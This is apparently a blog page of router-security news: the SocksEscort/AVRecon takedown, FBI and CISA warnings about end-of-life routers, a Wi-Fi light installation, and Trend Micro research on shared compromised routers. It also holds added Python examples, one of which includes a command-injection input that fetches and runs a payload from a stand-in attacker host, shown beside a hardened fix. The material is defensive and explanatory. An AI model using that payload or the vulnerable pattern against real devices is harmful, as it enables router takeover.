Showing posts with label Internet Routers.

Global Law Enforcement Disrupts SocksEscort Proxy Network Powered by AVRecon Malware

Federal and regional police agencies, working with private-sector security researchers, have dismantled the SocksEscort proxy service. The service routed illicit traffic through home and small-office routers that had been compromised by the AVRecon malware, letting its customers hide behind residential IP addresses.

Black Lotus Labs, the threat research team at Lumen Technologies, supported the takedown alongside the U.S. Department of Justice. Over several years the investigators observed the proxy service keeping roughly 20,000 compromised devices active in any given week, a measure of both its reach and its persistence.

SocksEscort was first publicly documented in 2023, although evidence points to activity going back more than a decade. The service sold access to IP addresses that looked legitimate because they belonged to residential and small-business network devices. Traffic relayed through those addresses appeared to come from ordinary ISP customers, so reputation-based detection tools frequently failed to flag it.

By early 2026, authorities reported that the service had offered access to a very large number of IP addresses over its lifetime, and that nearly 8,000 compromised routers were still active. Roughly a quarter of those were located in the U.S. Although the investigation centered on a single service, the proxies were used in a range of financial crimes.

Investigators linked SocksEscort to the theft of nearly $1 million from digital wallets belonging to a New York resident, and to about $700,000 lost by a Pennsylvania industrial company to fraud. U.S. military personnel were also among the victims after their personal banking information was compromised.

Dozens of domains and servers tied to the network were seized across Europe in an action coordinated by Europol, with support from law enforcement in Austria, France, and the Netherlands. Around $3.5 million in cryptocurrency was frozen during the operation. The infrastructure behind the service was AVRecon, a malware family that targets Linux-based home and small-office routers.

By June 2023, AVRecon had infected more than 70,000 devices, forming a large botnet whose sole purpose was to supply SocksEscort with proxy exit points. Analysts noted something unusual: none of the infected IP addresses appeared in other botnets' activity, which suggests the operators kept tight control over how the devices were used. Early in 2023 the operation was briefly disrupted when its command-and-control channels were cut off, but the group recovered by rebuilding its infrastructure around decentralized control nodes rather than a single hub, and resumed activity months later over modified communication paths.

By early 2025, more than 280,000 distinct IP addresses had been drawn into the activity. Infections were global, but devices in the U.S. and the U.K. were especially prized because traffic from those countries blends in well when hiding malicious behavior. Practitioners recommend the usual router hygiene: replace devices that no longer receive vendor support, keep firmware current, change default administrator credentials promptly, and disable remote-management features that are not in use. These small changes remove the easiest entry points.

The case shows how criminal groups built around covert relay infrastructure continue to expand their reach, and why cross-border cooperation is essential to disrupting them.

FBI Warns Outdated Wi-Fi Routers Are Being Targeted in Malware and Botnet Attacks

The FBI warns that home routers which have reached the end of manufacturer support pose a growing security risk. Devices sold from the late 2000s to the early 2010s have mostly dropped out of their vendors' update cycles, so vulnerabilities discovered after that point are never patched and remain exploitable indefinitely. That gap is what has drawn the attention of officials tracking threats to household networks.

Once patching stops, known weaknesses stay open, and obsolete routers have become attractive targets for criminals deploying malware. Attackers gain administrator-level access without the owner noticing, and the infected device is then enrolled in a remotely controlled botnet. Law enforcement has issued warnings about this pattern repeatedly.

A botnet is a collection of hijacked devices that answer to a remote operator. Botnets are used to launch large-scale attacks, but they are also used as relays: rather than attacking directly, criminals route malicious traffic through the infected devices so that the true origin of the activity is hidden.

The FBI's list includes several Linksys routers released in 2011, among them the E1200, E2500, and E4200, as well as older models such as the WRT320N (2009) and the M10 (2010). Many of these routers offer remote management, which lets owners change settings through a web interface reachable over the internet.

That convenience becomes a liability when the underlying firmware has known, unpatched flaws. Attackers routinely scan the internet for routers with exposed management ports, particularly those running old software versions. Having identified a vulnerable router, they exploit the flaw to install malware on the device itself. The implant gives the intruder full control and opens a covert channel to a remote command server.

Compromised routers typically check in with that server about once a minute to signal that they are online and awaiting instructions. Open network ports also let the malware turn the router into a proxy: attackers push their traffic through the infected network rather than originating it from their own systems, and some sell that access to third parties who want to disguise their location. Router infections are hard for most owners to spot.

Conventional antivirus products protect laptops and phones, not routers, so the device falls outside their coverage. Because the malware runs inside the router's own firmware, nothing visibly changes: the network keeps working normally while the implant sits undetected. Older routers that no longer receive updates become weak points over time.
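Because endpoint antivirus never sees the router, the practical place to look for the once-a-minute check-ins described above is the network. The script below is an added example, not part of the FBI notice or any vendor tool. It assumes you can export outbound connection logs from a perimeter device sitting in front of the router (a firewall or a NetFlow collector), in a constructed syslog-like format of one connection per line. It groups connections by source and destination, measures the gaps between successive connections, and flags flows whose timing is too regular to be a person browsing. The log lines are constructed for the example; the router at 192.168.0.1 and the server at 203.0.113.10 are placeholders.

```python
"""Beacon detection over outbound connection logs (added example, not from the FBI notice).

Assumed input: a constructed log from a perimeter device in front of the router,
one outbound connection per line:
    <ISO-8601 timestamp> <src ip> -> <dst ip>:<port>
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: a router checking in with 203.0.113.10:443 every ~60 s,
# mixed with ordinary browsing from a laptop (192.168.0.20) on the same network.
SAMPLE_LOG = """\
2025-06-01T12:00:00Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:00:07Z 192.168.0.20 -> 198.51.100.5:443
2025-06-01T12:01:01Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:01:30Z 192.168.0.20 -> 198.51.100.8:80
2025-06-01T12:01:59Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:02:45Z 192.168.0.20 -> 198.51.100.5:443
2025-06-01T12:03:00Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:04:02Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:04:10Z 192.168.0.20 -> 198.51.100.9:443
2025-06-01T12:04:58Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:06:00Z 192.168.0.1 -> 203.0.113.10:443
2025-06-01T12:09:33Z 192.168.0.20 -> 198.51.100.5:443
"""


def parse_log(text):
    """Yield (timestamp, src, dst:port) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "->":
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, parts[1], parts[3]


def find_beacons(text, min_count=5, max_jitter=0.25):
    """Return {(src, dst): (count, mean_gap_seconds, jitter)} for periodic flows.

    jitter is the coefficient of variation (stdev / mean) of the gaps between
    successive connections. A scripted check-in has low jitter; human browsing
    to the same site does not, so it falls out of the result.
    """
    flows = defaultdict(list)
    for ts, src, dst in parse_log(text):
        flows[(src, dst)].append(ts)

    beacons = {}
    for key, times in flows.items():
        if len(times) < min_count:          # too few samples to call it periodic
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else float("inf")
        if jitter <= max_jitter:
            beacons[key] = (len(times), round(avg, 1), round(jitter, 3))
    return beacons


if __name__ == "__main__":
    for (src, dst), (n, avg, jit) in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {n} connections, every {avg}s (jitter {jit})")
```

On the constructed log the router's flow is reported with seven connections, a 60-second mean gap and a jitter of about 0.04, while the laptop's repeated visits to 198.51.100.5 are dropped by the minimum-count filter. Thresholds are deliberately loose; on real data you would tune `min_count` and `max_jitter` against a day of known-good traffic and whitelist legitimate periodic flows such as NTP and the router's own update checks.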

For that reason, specialists recommend replacing them. A current model that still receives firmware updates closes the most common route into a home network: obsolete equipment that will never be patched.

Raspberry Pi Project Turns Wi-Fi Signals Into Visual Light Displays

Wireless communication surrounds people at all times, even though it cannot be seen. Signals from Wi-Fi routers, Bluetooth devices, and mobile networks constantly travel through homes and cities unless blocked by heavy shielding. A France-based digital artist has developed a way to visually represent this invisible activity using light and low-cost computing hardware.

The creator, Théo Champion, who is also known online as Rootkid, designed an installation called Spectrum Slit. The project captures radio activity from commonly used wireless frequency ranges and converts that data into a visual display. The system focuses specifically on the 2.4 GHz and 5 GHz bands, which are widely used for Wi-Fi connections and short-range wireless communication.

The artwork consists of 64 vertical LED filaments arranged in a straight line. Each filament represents a specific portion of the wireless spectrum. As radio signals are detected, their strength and density determine how brightly each filament lights up. Low signal activity results in faint and scattered illumination, while higher levels of wireless usage produce intense and concentrated light patterns.

According to Champion, quiet network conditions create a subtle glow that reflects the constant but minimal background noise present in urban environments. As wireless traffic increases, the LEDs become brighter and more saturated, forming dense visual bands that indicate heavy digital activity.

A video shared on YouTube shows the construction process and the final output of the installation inside Champion’s Paris apartment. The footage demonstrates a noticeable increase in brightness during evening hours, when nearby residents return home and connect phones, laptops, and other devices to their networks.

Champion explained in an interview that his work is driven by a desire to draw attention to technologies people often ignore, despite their significant influence on daily life. By transforming technical systems into physical experiences, he aims to encourage viewers to reflect on the infrastructure shaping modern society and to appreciate the engineering behind it.

The installation required both time and financial investment. Champion built the system using a HackRF One software-defined radio connected to a Raspberry Pi. The radio device captures surrounding wireless signals, while the Raspberry Pi processes the data and controls the lighting behavior. The software was written in Python, but other components, including the metal enclosure and custom circuit boards, had to be professionally manufactured.

He estimates that development involved several weeks of experimentation, followed by a dedicated build phase. The total cost of materials and fabrication was approximately $1,000.

Champion has indicated that Spectrum Slit may be publicly exhibited in the future. He is also known for creating other technology-focused artworks, including interactive installations that explore data privacy, artificial intelligence, and digital systems. He has stated that producing additional units of Spectrum Slit could be possible if requested.

CISA Warns of Renewed Exploits Targeting TP-Link Routers with Critical Flaws

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned that a vulnerability in several end-of-life TP-Link router models is being actively exploited. Although the flaw was identified years ago, it has resurfaced in recent attack campaigns, prompting CISA to add it to its Known Exploited Vulnerabilities (KEV) catalog.

The issue is a command injection vulnerability with a CVSS score of 8.8 (high). It affects three models: the TP-Link TL-WR940N, TL-WR841N, and TL-WR740N. The flaw lies in the routers' web-based management interface, where input that is not properly validated is passed through to the underlying system, letting an attacker execute arbitrary commands on the device. It can be exploited remotely if remote management is exposed to the internet, or from inside the network otherwise.
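The bug class is easier to reason about with the vulnerable pattern next to its fix. The block below is an added illustration written for this page; it is not TP-Link's code, says nothing about where the real flaw sits in that firmware, and uses invented handler names. It models the common case of a "diagnostic ping" page in a router's web UI that builds a shell command from the target the user types in. The vulnerable function returns the string such a handler would hand to the system shell, so the injected payload can be inspected without executing anything; the hardened function validates the target against an allow-list and builds an argv list so that no shell ever parses user input. The hostnames and the attacker payload are constructed for the example.

```python
"""Command injection in a router 'diagnostic ping' handler, beside a hardened version.

Added illustration of the bug class in CISA's advisory; NOT TP-Link's code, and the
handler names are invented. The vulnerable path only returns the shell string it
would execute, so the payload can be examined safely.
"""
import ipaddress
import re
import subprocess

# Constructed inputs: what a legitimate user types, and what an attacker submits.
LEGIT_HOST = "192.0.2.10"
MALICIOUS_HOST = "192.0.2.10; wget http://attacker.example/bot -O /tmp/b; sh /tmp/b"

# RFC 1123 hostname: labels of letters, digits and hyphens, no leading/trailing
# hyphen, total length at most 253. Shell metacharacters cannot match this.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_ping_command(host):
    """The bug: user input concatenated into a command line for /bin/sh.

    A firmware handler that runs this string through system() executes
    everything after the ';' as well, and on a router that means as root.
    """
    return f"ping -c 1 {host}"


def is_valid_target(host):
    """Allow-list check: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(host))


def hardened_ping_argv(host):
    """The fix: validate first, then build an argv list so no shell interprets it.

    The allow-list also rules out a target starting with '-', so the input
    cannot be smuggled in as an extra option to ping.
    """
    if not is_valid_target(host):
        raise ValueError("rejected diagnostic target")
    return ["ping", "-c", "1", host]


def run_diagnostic(host, timeout=5):
    """Run the hardened command without a shell (shell=False is the default)."""
    completed = subprocess.run(hardened_ping_argv(host), capture_output=True,
                               text=True, timeout=timeout)
    return completed.returncode


if __name__ == "__main__":
    print("vulnerable would run:", vulnerable_ping_command(MALICIOUS_HOST))
    print("hardened argv       :", hardened_ping_argv(LEGIT_HOST))
    try:
        hardened_ping_argv(MALICIOUS_HOST)
    except ValueError as err:
        print("hardened rejects    :", err)
```

Two points carry over to any language the firmware is actually written in: the argv list (or `execve` with separate arguments in C) removes the shell from the path entirely, and the allow-list is preferred over trying to strip "dangerous" characters, because blacklists on embedded web servers are where this class of bug keeps coming back.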

Although the vulnerability has been public for years, recent activity shows that attackers are targeting these devices again. Researchers note that the attack surface remains significant because the routers are still widely deployed in households and small offices.

CISA has directed federal agencies to remove the affected models from their networks by July 7, 2025, and strongly recommends that other organizations and individuals replace them as well.

The devices are especially exposed because the manufacturer no longer supports them: the TL-WR940N last received a firmware update in 2016, the TL-WR841N in 2015, and the TL-WR740N has gone without updates for more than 15 years. As end-of-life products they will receive no further security patches, so users are urged to move to routers that still get regular updates.

Current routers generally bring better performance, support for more devices, and built-in protections; some vendors also offer network-wide security features that screen connected devices for malware and intrusion attempts. Endpoint security software with extra tools such as a VPN and threat detection adds a further layer.

Outdated routers not only expose personal information but also deliver slower speeds and struggle with the number of devices in a modern connected home. Replacing obsolete hardware is a basic step in defending your digital life.

A router that receives timely security updates, combined with good security habits, substantially reduces your exposure to attack.

CISA's warning is a clear signal that relying on aging technology leaves both individuals and organizations open to renewed threats.

Hackers are Targeting Routers Across the Globe

When attackers find an unsecured router, they compromise it and install malware that gives them persistence, the ability to launch distributed denial-of-service (DDoS) attacks, a place to stash malicious data, and more. But what happens when they discover a router that a rival group has already compromised?

Trend Micro researchers published a report answering that question, and found one of two arrangements: either one party rents the compromised infrastructure to the other for a fee, or each group finds its own way into the device and both use it at the same time.

The researchers used Ubiquiti EdgeRouters as their example of internet routers exploited concurrently by several groups, some state-sponsored and others financially motivated.

“Cybercriminals and Advanced Persistent Threat (APT) actors share a common interest in proxy anonymization layers and Virtual Private Network (VPN) nodes to hide traces of their presence and make detection of malicious activities more difficult,” the researchers stated. “This shared interest results in malicious internet traffic blending financial and espionage motives.” 

In the EdgeRouter case, Trend Micro reported that APT28, the Russian state-sponsored group also known as Fancy Bear or Pawn Storm, used the devices for persistent espionage campaigns. At the same time, a financially motivated group known as the Canadian Pharmacy Gang used the same infrastructure to run pharmaceutical-themed phishing. Finally, the researchers found the Ngioweb malware, attributed to the Ramnit group, being loaded directly into the devices' memory.

EdgeRouters were targeted so often because their owners left them either undefended or only weakly protected. They are not unusual in this respect; routers in general are equally attractive targets. Trend Micro attributes this to lax password requirements, infrequent updates, and the fact that routers run capable operating systems that can be repurposed for many tasks.